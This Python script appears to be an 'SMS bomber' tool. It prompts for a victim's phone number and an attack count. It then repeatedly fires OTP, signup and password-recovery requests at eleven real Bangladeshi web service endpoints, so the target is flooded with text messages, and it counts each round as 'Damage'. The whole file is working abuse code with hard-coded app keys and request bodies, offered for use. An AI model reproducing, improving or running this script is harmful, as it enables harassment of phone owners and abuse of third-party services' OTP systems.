import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _______ _    _ _  _____                                         
 |__   __| |  | (_)/ ____|                                        
    | |  | |__| |_| (___                                          
    | |  |  __  | |\___ \                                         
    | |  | |  | | |____) |                                        
   _|_|_ |_|  |_|_|_____/____   __  __                            
  / ____|      / ____|__   __| |  \/  |                           
 | (___  _   _| (___    | | ___| \  / |                           
  \___ \| | | |\___ \   | |/ _ \ |\/| |                           
  ____) | |_| |____) |  | |  __/ |  | |                           
 |_____/ \__, |_____/___|_|\___|_|  |_|                           
  / ____| __/ |     |__   __|                                     
 | |     |___/___  __ _| | ___  _ __                              
 | |    | '__/ _ \/ _` | |/ _ \| '__|                             
 | |____| | |  __/ (_| | | (_) | |                                
  \_____|_|  \___|\__,_|_|\___/|_|                                
 |  _ \                                                           
 | |_) |_   _                                                     
 |  _ <| | | |                                                    
 | |_) | |_| |                                                    
 |____/ \__, |                                                    
         __/ |                                                    
   __  _|___/ _____         _____ _    _       _  ___ ____   __   
  / / | |  | |  __ \       / ____| |  | |     | |/ (_)  _ \  \ \  
 | |  | |__| | |  | |_____| (___ | |__| | __ _| ' / _| |_) |  | | 
 | |  |  __  | |  | |______\___ \|  __  |/ _` |  < | |  _ <   | | 
 | |  | |  | | |__| |      ____) | |  | | (_| | . \| | |_) |  | | 
 | |  |_|  |_|_____/      |_____/|_|  |_|\__,_|_|\_\_|____/   | | 
  \_\                                                        /_/  
                                                                  """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( HD-SHaKiiB ) ( GhOsToFKiinG ) ")


print ("""
          
                       
   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝
       
 
  
  
""")

number  = str(input("[>] Heii Mr : SHaKiiB Sir. apNar aTTack NumBer DiN: "))


amount = int(input("[>] Sir apNar aTTack ar PoriMaN LikHuN: "))

url1 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"

url2 = "http://45.114.85.19:8080/v3/otp/send?msisdn=88"+number

url3 = "https://htmind.live/api/user/otp-request?phone="+number

headers3 = CaseInsensitiveDict()
headers3["Content-Type"] = "application/json"
headers3["Content-Length"] = "0"

url4 = "https://ucapi.vnksrvc.com/users/send_user_otp.json"

headers4 = CaseInsensitiveDict()
headers4["Content-Type"]="application/json"

data4 = """{
  \"direct_login\": true,
  \"user\": {
    \"resend\": false,
    \"login\": \"88"""+number+"""\",
    \"type\": {
      \"register\": true
    }
  }
}"""

url5 = "https://ss.binge.buzz/otp/send/login"

headers5 = CaseInsensitiveDict()
headers5["Content-Type"] = "application/x-www-form-urlencoded"

data5 = "phone="+number

url6 = "https://www.mydrivebd.com/sapi/profile?action=signup&notify=true&rid=0.23183502639972242&validationkey=466429644f202f6120572a682b495374"

headers6 = CaseInsensitiveDict()
headers6["Content-Type"] = "application/json;charset=UTF-8"
headers6["x-deviceid"] = "web-d881a3b625c9fbbcaa2ae2ac2c8bb061"

data6 = """{
  \"data\": {
    \"user\": {
      \"generic\": {
        \"userid\": \"88"""+number+"""\",
        \"password\": \"niilahmed281\",
        \"l10n\": \"en\",
        \"acceptedtermsandconditions\": true
      }
    }
  }
}"""

url7 = "https://circle.robi.com.bd/mylife/appapi/appcall.php?op=getOTC&pin=13001&app_version=79&msisdn=88"+number

headers7 = CaseInsensitiveDict()
headers7["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers7["User-Agent"]="gzip"

url8 = "https://nitaiganj.com/submit/register_submit.php"


headers8 = CaseInsensitiveDict()
headers8["Content-Type"] = "application/x-www-form-urlencoded"

data8 = "usrFullName=Niil&authorPartialMobileNumbers=1819400400&usrPhone=%2B88"+number+"&usrPassword=123456&usrAddress=Chittagong&usrEmail=lwjwd21059%40driely.com"

url9 = "https://nitaiganj.com/submit/recover_submit.php"

headers9 = CaseInsensitiveDict()
headers9["Content-Type"] = "application/x-www-form-urlencoded"


data9 = "authorPartialMobileNumbers=1819400400&usrPhone=%2B88"+number

url10 = "https://api.bongo-solutions.com/auth/api/login/send-otp"

headers10 = CaseInsensitiveDict()
headers10["Content-Type"] = "application/json"

data10 = """{
  \"operator\": \"all\",
  \"msisdn\": \"88"""+number+"""\"
}"""

url11 = "https://heriken.com/fontend/Login/otp_send"

headers11 = CaseInsensitiveDict()
headers11["Content-Type"] = "application/x-www-form-urlencoded"

data11 = "phone="+number+"&c_name="


for i in range(amount):
	try:
		resp1 = requests.get(url1)
		
		resp2 = requests.get(url2)
		
		resp3 = requests.post(url3, headers=headers3)
		
		resp4 = requests.post(url4, headers=headers4,  data=data4)
		
		resp5 = requests.post(url5, headers=headers5, data=data5)
		
		resp6 = requests.post(url6, headers=headers6, data = data6)
		
		resp7 = requests.post(url7, headers=headers7)
		
		resp8 = requests.post(url8, headers=headers8, data= data8)
		
		resp9 = requests.post(url9, headers=headers9, data= data9)
		
		resp10 = requests.post(url10, headers=headers10, data = data10)
		
		resp11 = requests.post(url11, headers=headers11, data = data11)
		
		print(str (i+1)+" Damage \n")
	
	except:
		print ("Please Make Sure Your Internet Connection")